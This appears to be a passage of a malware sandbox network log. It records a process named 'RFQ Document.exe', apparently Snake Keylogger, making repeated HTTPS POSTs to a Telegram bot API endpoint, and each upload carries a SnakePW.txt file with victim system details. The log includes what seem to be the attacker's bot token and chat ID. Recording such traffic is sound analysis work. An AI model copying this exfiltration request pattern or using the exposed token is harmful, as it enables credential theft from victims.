                                            2021-09-28 05:59:43 UTC428OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 31 63 63 62 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f31ccb95Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:43 UTC429INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:43 UTC429INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12857,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            27192.168.2.449801149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:26 UTC43OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c51fba70
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:26 UTC43OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 31 66 62 61 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c51fba70Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:26 UTC43INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:26 UTC44INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12607,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            270192.168.2.450107149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:43 UTC429OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f33968c1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:43 UTC430OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 33 39 36 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f33968c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:43 UTC430INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:43 UTC431INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12858,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            271192.168.2.450108149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:43 UTC431OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3513e44
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:43 UTC431OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 35 31 33 65 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f3513e44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:43 UTC432INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:43 UTC432INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12859,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            272192.168.2.450109149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:43 UTC433OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3703e3c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:43 UTC433OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 37 30 33 65 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f3703e3cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC433INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC434INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12860,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            273192.168.2.450110149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:44 UTC434OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f385b3d9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:44 UTC435OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 38 35 62 33 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f385b3d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC435INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC435INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12862,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            274192.168.2.450111149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:44 UTC436OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3a4b001
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:44 UTC436OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 61 34 62 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f3a4b001Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:44 UTC437INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:44 UTC437INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12863,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            275192.168.2.450112149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:44 UTC437OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f3c3aea9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:44 UTC438OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 63 33 61 65 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
